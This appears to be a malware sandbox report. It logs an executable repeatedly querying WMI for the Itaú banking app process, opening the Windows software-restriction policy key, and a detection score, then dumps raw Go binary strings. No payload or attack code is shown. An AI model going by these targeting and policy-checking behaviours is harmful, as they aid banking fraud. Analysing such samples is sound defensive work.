Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = &apos;itauaplicativo.exe&apos;
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: leg#U00edvel9931-009-140.08372236.exe ReversingLabs: Detection: 21%
Source: leg#U00edvel9931-009-140.08372236.exe String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedframe_windowupdate_zero_inc_connaccess-control-allow-credentialsread limit of %d bytes exhausted: day-of-year does not match daybufio: invalid use of UnreadBytebufio: tried to fill full buffersync: Unlock of unlocked RWMutexsync: negative WaitGroup counter28421709430404007434844970703125MapIter.Value called before Next" not supported for cpu option "chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largego package net: hostLookupOrder(mime: expected token after slashresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyuse of closed network connectionGetVolumePathNamesForVolumeNameWed25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full blockcrypto/ecdh: invalid private keyunexpected character, want coloninput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit 
pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangepseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qrelease of handle with refcount 0bytes.Buffer.Grow: negative countskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Fi
